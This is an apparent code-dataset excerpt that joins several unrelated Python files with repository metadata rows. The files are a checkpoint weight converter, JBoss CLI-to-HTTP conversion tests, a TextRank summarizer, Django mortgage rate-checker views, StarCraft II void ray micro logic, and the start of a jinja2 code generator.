    reordered to torch's OIHW; other ranks pass through unchanged.
    """
    if conv_weights.ndim != 4:
        return torch.from_numpy(conv_weights)
    return torch.from_numpy(conv_weights.transpose([3, 2, 0, 1]))
def _rename_conv_weights_for_deformable_conv_layers(state_dict, cfg):
    """Rename conv2 weights of DCN stages and standardize them in place.

    For every ResNet stage flagged in cfg.MODEL.RESNETS.STAGE_WITH_DCN,
    "...block{ix}...conv2.{weight,bias}" keys move to "...conv2.conv.{...}",
    and the tensor is rewritten with weight standardization (zero mean,
    unit variance per output channel).  Keys containing "unit01" are
    skipped.  Mutates and returns `state_dict`.
    """
    import re
    layer_keys = sorted(state_dict.keys())
    # Stages are 1-indexed to match the "block{ix}" key naming.
    for ix, stage_with_dcn in enumerate(cfg.MODEL.RESNETS.STAGE_WITH_DCN, 1):
        if not stage_with_dcn:
            continue
        for old_key in layer_keys:
            pattern = ".*block{}.*conv2.*".format(ix)
            r = re.match(pattern, old_key)
            if r is None:
                continue
            for param in ["weight", "bias"]:
                # bugfix: was `old_key.find(param) is -1`, an identity
                # comparison on an int (SyntaxWarning on 3.8+, relies on
                # CPython small-int caching); use a membership test.
                if param not in old_key:
                    continue
                if 'unit01' in old_key:
                    continue
                new_key = old_key.replace(
                    "conv2.{}".format(param), "conv2.conv.{}".format(param)
                )
                print("pattern: {}, old_key: {}, new_key: {}".format(
                    pattern, old_key, new_key
                ))
                # Calculate SD conv weight
                w = state_dict[old_key]
                v, m = torch.var_mean(w, dim=[1, 2, 3], keepdim=True, unbiased=False)
                w = (w - m) / torch.sqrt(v + 1e-10)
                state_dict[new_key] = w
                del state_dict[old_key]
    return state_dict
def load_big_format(cfg, f):
    """Convert a "big"-format .npz checkpoint (TF naming) to a torch state dict.

    TF keys such as "resnet/block1/unit01/a/standardized_conv2d/kernel" are
    mapped to this codebase's module names, tensors are converted (and conv
    kernels transposed HWIO->OIHW) by tf2th, then DCN conv2 keys are renamed.
    """
    model = OrderedDict()
    weights = np.load(f)
    # Sub-conv letter -> numeric suffix of the torch conv/gn module names.
    cmap = {'a':1, 'b':2, 'c':3}
    for key, val in weights.items():
        old_key = key.replace('resnet/', '')
        if 'root_block' in old_key:
            # The stem convolution.
            new_key = 'root.conv.weight'
        elif '/proj/standardized_conv2d/kernel' in old_key:
            # Projection (downsample) convolution of a unit.
            key_pattern = old_key.replace('/proj/standardized_conv2d/kernel', '').replace('resnet/', '')
            bname, uname, cidx = key_pattern.split('/')
            new_key = '{}.downsample.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
        elif '/standardized_conv2d/kernel' in old_key:
            # Regular a/b/c convolution of a unit.
            key_pattern = old_key.replace('/standardized_conv2d/kernel', '').replace('resnet/', '')
            bname, uname, cidx = key_pattern.split('/')
            new_key = '{}.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
        elif '/group_norm/gamma' in old_key:
            # GroupNorm scale.
            key_pattern = old_key.replace('/group_norm/gamma', '').replace('resnet/', '')
            bname, uname, cidx = key_pattern.split('/')
            new_key = '{}.{}.gn{}.weight'.format(bname,uname,cmap[cidx])
        elif '/group_norm/beta' in old_key:
            # GroupNorm shift.
            key_pattern = old_key.replace('/group_norm/beta', '').replace('resnet/', '')
            bname, uname, cidx = key_pattern.split('/')
            new_key = '{}.{}.gn{}.bias'.format(bname,uname,cmap[cidx])
        else:
            print('Unknown key {}'.format(old_key))
            continue
        print('Map {} -> {}'.format(key, new_key))
        model[new_key] = tf2th(val)
    model = _rename_conv_weights_for_deformable_conv_layers(model, cfg)
    return dict(model=model)
| 40.345679 | 105 | 0.549266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 602 | 0.184211 |
25dd5361b6b0dc7b073414ddb1a152c255756063 | 10,975 | py | Python | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | null | null | null | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | 1 | 2021-06-02T00:39:33.000Z | 2021-06-02T00:39:33.000Z | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | null | null | null | import unittest
from convert import jboss_command_to_http_request
class TestJBOSSCommandToHTTPGETRequestOperationOnlyTestCase(unittest.TestCase):
    """Test case for JBOSS CLI operation-only commands converted for HTTP GET"""
    def test_no_path_one_operations_no_params_http_get(self):
        """See if operations without params return correctly using HTTP GET"""
        test_data = ':read-resource'
        # For GET the "read-" prefix is stripped from the operation name.
        desired_operation = {"operation": "resource"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_empty_params_http_get(self):
        """See if only operations with empty params return correctly using HTTP GET"""
        test_data = ':read-resource()'
        desired_operation = {"operation": "resource"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_single_param_http_get(self):
        """See if only operations with single parameter return correctly using HTTP GET"""
        test_data = ':read-resource(attributes-only=true)'
        desired_operation = {"operation": "resource", "attributes-only": "true"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_multiple_params_http_get(self):
        """See if only operations with multiple params return correctly using HTTP GET"""
        test_data = ':read-attribute(include-defaults=true,name=uuid)'
        desired_operation = {"operation": "attribute", "include-defaults": "true", "name": "uuid"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestOperationOnlyTestCase(unittest.TestCase):
    """Test case for JBOSS CLI operation-only commands converted for HTTP POST"""
    def test_no_path_one_operations_no_params_http_post(self):
        """See if operations without params return correctly using HTTP POST"""
        test_data = ':read-resource'
        # Unlike GET, POST keeps the full operation name.
        desired_operation = {"operation": "read-resource"}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_empty_params_http_post(self):
        """See if only operations with empty params return correctly using HTTP POST"""
        test_data = ':read-resource()'
        desired_operation = {"operation": "read-resource"}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_single_param_http_post(self):
        """See if only operations with single parameter return correctly using HTTP POST"""
        test_data = ':read-attribute(name=server-state)'
        desired_operation = {"operation": "read-attribute", "name": "server-state"}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_no_path_only_operations_multiple_params_http_post(self):
        """See if only operations with multiple params return correctly using HTTP POST"""
        test_data = ':read-operation-description(name=whoami,access-control=true)'
        desired_operation = {"operation": "read-operation-description", "name": "whoami", "access-control": "true"}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
# NOTE(review): the class name has a doubled leading "T" (likely a typo);
# unittest.main() still discovers it because it subclasses TestCase.
class TTestJBOSSCommandToHTTPGETRequestTestCase(unittest.TestCase):
    """Test case for convert.jboss_command_to_http_request using HTTP GET"""
    def test_single_path_and_operation_no_params_http_get(self):
        """See if command with path and operation returns correctly using HTTP GET"""
        test_data = '/subsystem=undertow:read-resource'
        # For GET the address is a slash-joined string, not a list.
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_single_param_http_get(self):
        """See if command with path, operation, and single param return correctly using HTTP GET"""
        test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "address": "/subsystem/undertow"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_multiple_params_http_get(self):
        """See if command with path, operation, and multiple params return correctly using HTTP GET"""
        test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true,name=instance-id)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "name": "instance-id",
            "address": "/subsystem/undertow"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_no_params_http_get(self):
        """See if command with multiple paths and operation return correctly using HTTP GET"""
        test_data = '/subsystem=undertow/server=default-server:read-resource'
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_empty_params_http_get(self):
        """See if command with multiple paths and empty params return correctly using HTTP GET"""
        test_data = '/subsystem=undertow/server=default-server:read-resource()'
        desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_single_param_http_get(self):
        """See if command with multiple paths, operation, and single param return correctly using HTTP GET"""
        test_data = '/subsystem=undertow/server=default-server:read-attribute(name=default-host)'
        desired_operation = {
            "operation": "attribute", "name": "default-host",
            "address": "/subsystem/undertow/server/default-server"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_multiple_param_http_get(self):
        """See if command with multiple paths, operation, and multiple params return correctly using HTTP GET"""
        test_data = '/subsystem=undertow/server=default-server:read-attribute(resolve-expressions=true,include-defaults=true,name=servlet-container)'
        desired_operation = {
            "operation": "attribute", "resolve-expressions": "true", "include-defaults": "true",
            "name": "servlet-container", "address": "/subsystem/undertow/server/default-server"
        }
        result = jboss_command_to_http_request(test_data, "GET")
        self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestTestCase(unittest.TestCase):
    """Test case for convert.jboss_command_to_http_request using HTTP POST"""
    def test_single_path_and_operation_no_params_http_post(self):
        """See if command with path and operation returns correctly using HTTP POST"""
        test_data = '/core-service=management:whoami'
        # For POST the address is a list of path segments.
        desired_operation = {"operation": "whoami", "address": ["core-service", "management"]}
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_single_param_http_post(self):
        """See if command with path, operation, and single param return correctly using HTTP POST"""
        test_data = '/core-service=server-environment:path-info(unit=GIGABYTES)'
        desired_operation = {
            "operation": "path-info", "unit": "GIGABYTES",
            "address": ["core-service", "server-environment"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_single_path_and_operation_multiple_params_http_post(self):
        """See if command with path, operation, and multiple params return correctly using HTTP POST"""
        test_data = '/subsystem=undertow:write-attribute(name=statistics-enabled,value=true)'
        desired_operation = {
            "operation": "write-attribute", "name": "statistics-enabled", "value": "true",
            "address": ["subsystem", "undertow"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_no_params_http_post(self):
        """See if command with multiple paths, operation, and no params return correctly using HTTP POST"""
        test_data = "/subsystem=datasources/data-source=ExampleDS:dump-queued-threads-in-pool()"
        desired_operation = {
            "operation": "dump-queued-threads-in-pool",
            "address": ["subsystem", "datasources", "data-source", "ExampleDS"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_single_param_http_post(self):
        """See if command with multiple paths, operation, and single param return correctly using HTTP POST"""
        test_data = "/core-service=management/service=configuration-changes:add(max-history=200)"
        desired_operation = {
            "operation": "add", "max-history": "200",
            "address": ["core-service", "management", "service", "configuration-changes"]
        }
        # bugfix: the second argument was previously `desired_operation`
        # (a dict) instead of the HTTP method string "POST".
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
    def test_multiple_path_and_operation_multiple_param_http_post(self):
        """See if command with multiple paths, operation, and multiple params return correctly using HTTP POST"""
        test_data = "/subsystem=datasources/data-source=ExampleDS:write-attribute(name=max-pool-size,value=5000)"
        desired_operation = {
            "operation": "write-attribute", "name": "max-pool-size", "value": "5000",
            "address": ["subsystem", "datasources", "data-source", "ExampleDS"]
        }
        result = jboss_command_to_http_request(test_data, "POST")
        self.assertEqual(result, desired_operation)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 50.810185 | 149 | 0.710251 | 10,848 | 0.988428 | 0 | 0 | 0 | 0 | 0 | 0 | 4,922 | 0.448474 |
25e0e386f4839503cf27575ea15bd5ecf033d49a | 113 | py | Python | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | 4 | 2021-02-04T17:33:07.000Z | 2022-01-24T10:29:39.000Z | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | null | null | null | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | null | null | null | from . import baselines
from . import common
from . import reward_machines
from . import rl
from . import worlds
| 18.833333 | 29 | 0.778761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25e3a85a64f47b2e6d11cb21908d899ff2ec1f13 | 1,328 | py | Python | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | from hipo_rank import Scores, Document, Summary
from summa.summarizer import summarize
class TextRankSummarizer:
    """Summarizer that flattens a document's sentences and delegates
    scoring/selection to the TextRank implementation in ``summa``.
    """

    def __init__(self, num_words: int = 200, stay_under_num_words: bool = False):
        """
        :param num_words: target word budget passed to summa's summarizer.
        :param stay_under_num_words: stored but currently unused here —
            presumably consumed by callers or kept for interface parity
            with other summarizers; confirm before removing.
        """
        print('\n-------------------------\ninit textrank\n-------------------------\n')
        self.num_words = num_words
        self.stay_under_num_words = stay_under_num_words

    def get_summary(self, doc: Document, sorted_scores: Scores = None) -> Summary:
        """Return a TextRank summary of *doc*.

        *sorted_scores* is accepted for interface compatibility but ignored.
        Each summary entry is (sentence, score, 0, 0, 0); the trailing
        zeros fill index slots this summarizer does not track.
        """
        print('\n-------------------------\nget_summary\n-------------------------\n')
        # Flatten all section sentences into a single list.
        # Bug fix: the original also built sect_idxs/local_idxs accumulators,
        # but appended the list to itself (`local_idxs.append(local_idxs)`)
        # and never read either list — the dead accumulators are removed.
        sentences = []
        for sect_idx, section in enumerate(doc.sections):
            for local_idx, sentence in enumerate(section.sentences):
                print('sentence: {}\n local_idx:{}\n sect_idx: {}\n'.format(sentence, local_idx, sect_idx))
                sentences.append(sentence)
        # summa returns (sentence, score) pairs when scores=True.
        sentences = summarize(" ".join(sentences), scores=True, words=self.num_words)
        summary = [(s[0], s[1], 0, 0, 0) for s in sentences]
        print('summary len: {}'.format(len(summary)))
        print('\n-------------------------\nexit get_summary\n-------------------------\n')
        return summary
| 42.83871 | 107 | 0.557229 | 1,236 | 0.930723 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.225904 |
25e441bb1d41908f9089cf20c37bdbf87f2df670 | 8,415 | py | Python | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | 1 | 2019-02-25T21:46:14.000Z | 2019-02-25T21:46:14.000Z | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | from django.db.models import Q, Sum, Avg
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from ratechecker.models import Region, Rate, Adjustment, Fee
from ratechecker.ratechecker_parameters import ParamsSerializer
def get_rates(params_data, data_load_testing=False, return_fees=False):
    """Query rates matching the given loan parameters.

    params_data is a dict of validated loan parameters (produced by
    ParamsSerializer).  Returns a dict with:
      'data': mapping of base-rate string -> number of institutions
              offering that rate (or, when data_load_testing is True,
              base-rate string -> total points as a string),
      'timestamp': data load timestamp taken from the matched rates,
      'fees': average fee figures (only when return_fees is True and
              matching rates were found).
    """
    # the precalculated results are done by favoring negative points over
    # positive ones, and the API does the opposite
    factor = 1
    if data_load_testing:
        factor = -1
    # All regions belonging to the requested state.
    region_ids = list(Region.objects.filter(
        state_id=params_data.get('state')).values_list('region_id', flat=True))
    # Unknown state: nothing to query, return an empty result.
    if not region_ids:
        return {'data': {}, 'timestamp': None}
    # Base rate query: match loan characteristics against product limits.
    rates = Rate.objects.filter(
        region_id__in=region_ids,
        product__loan_purpose=params_data.get('loan_purpose'),
        product__pmt_type=params_data.get('rate_structure'),
        product__loan_type=params_data.get('loan_type'),
        product__max_ltv__gte=params_data.get('max_ltv'),
        product__loan_term=params_data.get('loan_term'),
        product__max_loan_amt__gte=params_data.get('loan_amount'),
        product__max_fico__gte=params_data.get('maxfico'),
        product__min_fico__lte=params_data.get('minfico'))
    # FHA high-balance loans skip the minimum-loan-amount floor.
    if params_data.get('loan_type') != 'FHA-HB':
        rates = rates.filter(
            product__min_loan_amt__lte=params_data.get('loan_amount'))
    # ARM loans also match on the initial adjustment term (e.g. '5-1' -> '5')
    # and the interest-only flag.
    if params_data.get('rate_structure') == 'ARM':
        rates = rates.filter(
            product__int_adj_term=params_data.get('arm_type')[:-2],
            product__io=bool(params_data.get('io')))
    # Load-testing mode pins a single institution and exact lock period;
    # normal mode matches a lock window (min_lock, max_lock].
    if data_load_testing:
        rates = rates.filter(
            product__institution=params_data.get('institution'),
            lock=params_data.get('lock'))
    else:
        rates = rates.filter(
            lock__lte=params_data.get('max_lock', 0),
            lock__gt=params_data.get('min_lock', 0))
    # Materialize the queryset and collect the distinct product ids
    # (keyed by product+region to deduplicate).
    all_rates = []
    products = {}
    for rate in rates:
        all_rates.append(rate)
        products["{}{}".format(
            rate.product_id, rate.region_id)] = rate.product_id
    product_ids = products.values()
    # Sum all applicable adjustments per product, split by whether the
    # adjustment affects points ('P') or rate ('R').  NULL limits mean
    # "no restriction" and therefore always match.
    adjustments = Adjustment.objects.filter(
        product__plan_id__in=product_ids).filter(
        Q(max_loan_amt__gte=params_data.get('loan_amount'))
        | Q(max_loan_amt__isnull=True),
        Q(min_loan_amt__lte=params_data.get('loan_amount'))
        | Q(min_loan_amt__isnull=True),
        Q(prop_type=params_data.get('property_type'))
        | Q(prop_type__isnull=True) | Q(prop_type=""),
        Q(state=params_data.get('state'))
        | Q(state__isnull=True) | Q(state=""),
        Q(max_fico__gte=params_data.get('maxfico'))
        | Q(max_fico__isnull=True),
        Q(min_fico__lte=params_data.get('minfico'))
        | Q(min_fico__isnull=True),
        Q(min_ltv__lte=params_data.get('min_ltv'))
        | Q(min_ltv__isnull=True),
        Q(max_ltv__gte=params_data.get('max_ltv'))
        | Q(max_ltv__isnull=True),
    ).values('product_id',
             'affect_rate_type').annotate(sum_of_adjvalue=Sum('adj_value'))
    # product_id -> {'P': summed point adjustment, 'R': summed rate adjustment}
    summed_adj_dict = {}
    for adj in adjustments:
        current = summed_adj_dict.get(adj['product_id'], {})
        current[adj['affect_rate_type']] = adj['sum_of_adjvalue']
        summed_adj_dict[adj['product_id']] = current
    # For each product keep the single rate whose adjusted points are
    # closest to the requested points (within +/-0.5).
    available_rates = {}
    data_timestamp = ""
    for rate in all_rates:
        # TODO: check that it the same all the time, and do what if it is not?
        data_timestamp = rate.data_timestamp
        product = summed_adj_dict.get(rate.product_id, {})
        # Apply the summed adjustments in place on the ORM instances
        # (not saved, only used for this response).
        rate.total_points += product.get('P', 0)
        rate.base_rate += product.get('R', 0)
        distance = abs(params_data.get('points') - rate.total_points)
        if float(distance) > 0.5:
            continue
        if rate.product_id not in available_rates:
            available_rates[rate.product_id] = rate
        else:
            current_difference = abs(
                params_data.get('points') -
                available_rates[rate.product_id].total_points
            )
            new_difference = abs(params_data.get('points') - rate.total_points)
            # On a tie, `factor` decides whether negative or positive
            # points win (flipped in data-load-testing mode, see above).
            if new_difference < current_difference or (
                    new_difference == current_difference and
                    factor * available_rates[
                        rate.product_id].total_points < 0 and
                    factor * rate.total_points > 0):
                available_rates[rate.product_id] = rate
    # Aggregate the chosen rates: count institutions per base rate
    # (or expose raw points in load-testing mode).
    data = {}
    for rate in available_rates:
        key = str(available_rates[rate].base_rate)
        current_value = data.get(key, 0)
        if data_load_testing:
            data[key] = "%s" % available_rates[rate].total_points
        else:
            data[key] = current_value + 1
    results = {'data': data, 'timestamp': data_timestamp}
    # Optionally attach average fees across the matched plans/state.
    if return_fees and data:
        fees = Fee.objects.filter(plan__plan_id__in=available_rates.keys(),
                                  state_id=params_data.get('state'))
        if params_data.get('property_type', 'SF') == 'SF':
            fees = fees.filter(single_family=True)
        elif params_data.get('property_type', 'SF') == 'CONDO':
            fees = fees.filter(condo=True)
        elif params_data.get('property_type', 'SF') == 'COOP':
            fees = fees.filter(coop=True)
        averages = fees.aggregate(
            origination_dollar=Avg('origination_dollar'),
            origination_percent=Avg('origination_percent'),
            third_party=Avg('third_party'))
        results['fees'] = averages
    # With no matching rates, fall back to any region's load timestamp so
    # the caller still learns how fresh the data is.
    if not data:
        obj = Region.objects.first()
        if obj:
            results['timestamp'] = obj.data_timestamp
    return results
def set_lock_max_min(data):
    """Translate a 'lock' query parameter into min/max lock bounds.

    Mutates and returns *data*: when data['lock'] is one of the known
    lock periods ('30', '45', '60'), adds 'min_lock' and 'max_lock'
    keys with the day-window bounds the rate query expects
    (get_rates filters lock__gt=min_lock, lock__lte=max_lock).
    Unknown or missing lock values leave *data* untouched.
    """
    # lock period -> (min_lock, max_lock)
    lock_map = {
        '30': (0, 30),
        '45': (31, 45),
        '60': (46, 60),
    }
    lock = data.get('lock')
    # Simplified: the old `if lock and lock in lock_map` truthiness guard
    # was redundant (None/'' are never keys), and both branches returned
    # the same dict.
    if lock in lock_map:
        data['min_lock'], data['max_lock'] = lock_map[lock]
    return data
@api_view(['GET'])
def rate_checker(request):
    """
    Return available rates in percentage and number of institutions
    with the corresponding rate
    (i.e. "4.75": 2 means there are 2 institutions with the rate of 4.75%)
    """
    if request.method == 'GET':
        # Clean the parameters, make sure no leading or trailing spaces,
        # transform them to upper cases
        # NOTE: Python 2 only — tuple-unpacking lambda and .iteritems().
        fixed_data = dict(map(
            lambda (k, v): (k, v.strip().upper()),
            request.query_params.iteritems()))
        # Expand the 'lock' parameter into min_lock/max_lock bounds
        # before validation.
        fixed_data = set_lock_max_min(fixed_data)
        serializer = ParamsSerializer(data=fixed_data)

        if serializer.is_valid():
            rate_results = get_rates(serializer.validated_data)
            # Echo the validated parameters back so the client can see
            # what the query actually used.
            rate_results['request'] = serializer.validated_data
            return Response(rate_results)
        else:
            # Validation failed: return field-level errors as 400.
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET'])
def rate_checker_fees(request):
    """
    Return available rates in percentage and number of institutions
    with the corresponding rate along with fees data
    """
    if request.method == 'GET':
        # Clean the parameters, make sure no leading or trailing spaces,
        # transform them to upper cases
        # NOTE: Python 2 only — tuple-unpacking lambda and .iteritems().
        fixed_data = dict(map(
            lambda (k, v): (k, v.strip().upper()),
            request.query_params.iteritems()))
        # NOTE(review): unlike rate_checker, this endpoint never calls
        # set_lock_max_min, so 'lock' is not expanded into
        # min_lock/max_lock — confirm this is intentional.
        serializer = ParamsSerializer(data=fixed_data)

        if serializer.is_valid():
            # return_fees=True adds the averaged fee figures to the result.
            rate_results = get_rates(
                serializer.validated_data, return_fees=True)
            # Echo the validated parameters back to the client.
            rate_results['request'] = serializer.validated_data
            return Response(rate_results)
        else:
            # Validation failed: return field-level errors as 400.
            return Response(
                serializer.errors, status=status.HTTP_400_BAD_REQUEST
            )
class RateCheckerStatus(APIView):
    """Expose the timestamp of the most recent ratechecker data load."""

    def get(self, request, format=None):
        """Return {'load': <timestamp>} or {'load': None} when no data exists."""
        load_ts = None
        try:
            load_ts = Region.objects.latest('data_timestamp').data_timestamp
        except Region.DoesNotExist:
            # Empty table: report None rather than erroring out.
            pass
        return Response({'load': load_ts})
| 36.907895 | 79 | 0.627213 | 271 | 0.032204 | 0 | 0 | 1,831 | 0.217588 | 0 | 0 | 1,556 | 0.184908 |
25e493076be7380951a97b3f9afcdfcdb4f2cbab | 2,247 | py | Python | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | 2 | 2020-08-13T01:25:20.000Z | 2020-11-22T19:00:06.000Z | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
    """Micro-management step for Void Ray units (sharpy combat manager)."""

    def should_retreat(self, unit: Unit) -> bool:
        """Return True when *unit* should pull back.

        Fires on low combined shield+health (< 20%), a negative weapon
        cooldown (per the original inline comment, a unit that can't
        attack), or standing inside a dangerous enemy area effect.
        """
        if unit.shield_max + unit.health_max > 0:
            health_percentage = (unit.shield + unit.health) / (unit.shield_max + unit.health_max)
        else:
            # No hit points reported at all — treat as 0%.
            health_percentage = 0
        if health_percentage < 0.2 or unit.weapon_cooldown < 0:
            # low hp or unit can't attack
            return True
        # Dodge hostile area effects: retreat when the unit is near the
        # center of a corrosive bile (radius 3 check) or a blinding
        # cloud / psi storm (radius 4 checks).
        for effect in self.ai.state.effects:
            if effect.id == EffectId.RAVAGERCORROSIVEBILECP:
                if Point2.center(effect.positions).distance_to(unit) < 3:
                    return True
            if effect.id == EffectId.BLINDINGCLOUDCP:
                if Point2.center(effect.positions).distance_to(unit) < 4:
                    return True
            if effect.id == EffectId.PSISTORMPERSISTENT:
                if Point2.center(effect.positions).distance_to(unit) < 4:
                    return True
        return False

    def group_solve_combat(self, units: Units, current_command: Action) -> Action:
        """No group-level override — keep the incoming command unchanged."""
        return current_command

    def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
        """Decide this Void Ray's action for the current combat step."""
        # Barely any fight available or possible — just follow orders.
        if self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25:
            return current_command
        # Never override explicit retreat moves.
        if self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}:
            return current_command
        # Use Prismatic Alignment when it is off cooldown and an armored
        # enemy is within range 7 (the ability boosts damage vs armored).
        if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
            close_enemies = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
            if close_enemies:
                return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
        # Not in a shoot window and retreat conditions met: move toward
        # the nearest low-air-threat position (search parameter 4 —
        # presumably a radius; confirm against pather implementation).
        if not self.should_shoot() and self.should_retreat(unit):
            pos = self.pather.find_weak_influence_air(unit.position, 4)
            return Action(pos, False)
        return self.focus_fire(unit, current_command, None)

    def should_shoot(self):
        """True during the first 8 of every 24 game loops — presumably a
        stutter-step firing rhythm; confirm intent."""
        tick = self.ai.state.game_loop % 24
        return tick < 8
| 40.854545 | 102 | 0.655986 | 2,029 | 0.902982 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.012906 |
25e59c2417ca0a19fe3514be2c7d45d995e484b2 | 2,861 | py | Python | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | 1 | 2019-09-18T09:43:15.000Z | 2019-09-18T09:43:15.000Z | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | null | null | null | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2019 EXXETA AG and others.
#
# This file is part of k8s-python-tools
# (see https://github.com/EXXETA/k8s-python-tools).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re

from jinja2 import Environment, FileSystemLoader

"""load self-defined generated_library.yml and use this information to generate api methods.
using jinja2 templating engine to generate python files
"""

# Directory containing this script; all input/output paths are resolved
# relative to it.
__location__ = os.path.join(os.getcwd(), os.path.dirname(__file__))

# Prefer the C-accelerated YAML loader/dumper when libyaml is available.
try:
    from yaml import CLoader as Loader, CDumper as Dumper, load
